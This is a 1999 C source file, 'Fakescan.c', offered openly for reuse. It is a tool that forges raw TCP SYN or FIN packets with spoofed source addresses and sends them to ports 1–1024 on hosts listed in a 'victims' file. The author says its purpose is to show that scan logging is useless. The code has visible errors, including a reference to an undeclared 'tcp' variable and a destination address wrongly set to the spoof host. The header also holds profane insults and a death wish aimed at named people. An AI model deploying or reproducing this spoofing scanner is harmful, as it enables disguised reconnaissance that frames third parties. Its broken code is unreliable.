/* Fakescan.c (c) 1999 Vortexia / Andrew Alston andrew@idle.za.org
Ok... more crap code from me... thats yes... entirely useless other than
as a proof of case. I wrote this quickly while trying to prove the case
that logging portscans that are syn/fin based is entirely useless.
What the code does:
It reads in a list of hosts to spoof from a spoof host, and sends fake
fin or syn scans to a list of hosts found in the victims file.
Sorry there is no dns resolve on hosts in those files, it was a quick job
while I was bored and I found better things to do while coding it so
I didnt get around to adding it.
The code is once again written for BSD and compiles with no warnings under
fbsd 3.2 - I hate linux - Dont expect a linux port from me, someone else -
feel free to make one
If you wanna use my code, as always, feel free but I expect credit
where credit is due, I.E you use my code, you put my name in your code.
Greets and Shoutouts..
Mithrandi - Thanks for your help
Ultima - For everything you've helped me with in the past
Van - What can I say, HI
TimeWiz - Thanks for help in times past, and for ideas for upcoming projects
Sniper - My partner in crime - You have and always will rock
Opium - HI
Hotmetal - A general greet
DrSmoke - HI
jus - My social engineering partner - lets continue to mindfuck together
OPCODE - Thanks for the help - you rock
gr1p and all the people at b4b0 - Keep rocking guys
To all the people at Forbidden knowledge - Good going - Keep it up
To everyone else on all the networks and channels I hang on,
a general greet and thanks - I couldnt keep doing what I do without you guys.
Fuckoffs, Curses and the likes:
To Sunflower - If you cant handle an insult in a piece of code - and think
thats worth of an akill - GROW UP AND GO FUCK YOURSELF
To Gaspode - May you die a slow and painful death, and may the fleas of
10000 camels infest your armpits
To the person who said coding stuff like this was for script kiddies -
GET A CLUE you know who you are
To anyone else I dont like - FUCK YOU
To anyone else who doesnt like me - FUCK YOU
*/
#define __FAVOR_BSD
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
struct viclist
{
struct in_addr victim;
struct viclist *link;
};
struct slist
{
struct in_addr spoof;
struct slist *link;
};
int
main (int argc, char *argv[])
{
int i = 0;
int sock;
int on = 1;
struct sockaddr_in sockstruct;
struct ip *iphead;
struct tcphdr *tcphead;
char evilpacket[sizeof (struct ip) + sizeof (struct tcphdr)];
int seq, ack;
FILE *victimfile;
FILE *spooffile;
char buffer[256];
struct viclist *vcur, *vfirst;
struct slist *scur, *sfirst;
bzero (evilpacket, sizeof (evilpacket));
vfirst = malloc (sizeof (struct viclist));
vcur = vfirst;
vcur->link = NULL;
sfirst = malloc (sizeof (struct slist));
scur = sfirst;
scur->link = NULL;
if (argc < 4)
{
printf ("Usage: %s scan_type ((S)yn/(F)in) spoof_file victim_file
Example: %s S spooffile victimfile\n", argv[0], argv[0]);
exit (-1);
};
if ((strncmp (argv[1], "S", 1)) && (strncmp (argv[1], "F", 1)))
{
printf ("Scan type not specified\n");
exit (-1);
}
if ((spooffile = fopen ((char *) argv[2], "r")) <= 0)
{
perror ("fopen");
exit (-1);
}
else
{
while (fgets (buffer, 255, spooffile))
{
if (!(inet_aton (buffer, &(scur->spoof))))
printf ("Invalid address found in victim file.. ignoring\n");
else
{
scur->link = malloc (sizeof (struct slist));
scur = scur->link;
scur->link = NULL;
}
};
bzero (buffer, sizeof (buffer));
};
fclose (spooffile);
scur = sfirst;
while (scur->link != NULL)
{
printf ("Found spoof host: %s\n", inet_ntoa (scur->spoof));
scur = scur->link;
};
scur = sfirst;
if ((victimfile = fopen ((char *) argv[3], "r")) <= 0)
{
perror ("fopen");
exit (-1);
}
else
{
while (fgets (buffer, 255, victimfile))
{
if (!(inet_aton (buffer, &(vcur->victim))))
printf ("Invalid address found in victim file.. ignoring\n");
else
{
vcur->link = malloc (sizeof (struct viclist));
vcur = vcur->link;
vcur->link = NULL;
}
};
bzero (buffer, sizeof (buffer));
};
fclose (victimfile);
vcur = vfirst;
while (vcur->link != NULL)
{
printf ("Found victim host: %s\n", inet_ntoa (vcur->victim));
vcur = vcur->link;
};
vcur = vfirst;
if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror ("socket");
exit (-1);
}
if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof (on)) <
0)
{
perror ("setsockopt");
exit (-1);
}
sockstruct.sin_family = AF_INET;
iphead = (struct ip *) evilpacket;
tcphead = (struct tcphdr *) (evilpacket + sizeof (struct ip));
iphead->ip_hl = 5;
iphead->ip_v = 4;
iphead->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);
iphead->ip_id = htons (getpid ());
iphead->ip_ttl = 255;
iphead->ip_p = IPPROTO_TCP;
iphead->ip_sum = 0;
iphead->ip_tos = 0;
iphead->ip_off = 0;
tcphead->th_win = htons (512);
if (!(strncmp (argv[1], "S", 1)))
tcphead->th_flags = TH_SYN;
else
tcphead->th_flags = TH_FIN;
tcphead->th_off = 0x50;
while (vcur->link != NULL)
{
iphead->ip_dst = vcur->victim;
sleep (1);
while (scur->link != NULL)
{
tcphead->th_sport = htons (rand () % time (NULL));
sockstruct.sin_port = tcp->th_sport;
iphead->ip_src = scur->spoof;
sockstruct.sin_addr = scur->spoof;
sleep (1);
for (i = 1; i <= 1024; i++)
{
srand (getpid ());
seq = rand () % time (NULL);
ack = rand () % time (NULL);
tcphead->th_seq = htonl (seq);
tcphead->th_ack = htonl (ack);
tcphead->th_dport = htons (i);
sendto (sock, &evilpacket, sizeof (evilpacket), 0x0,
(struct sockaddr *) &sockstruct, sizeof (sockstruct));
}
scur = scur->link;
}
scur = sfirst;
vcur = vcur->link;
}
return (1);
};
syntax highlighted by Code2HTML, v. 0.9.1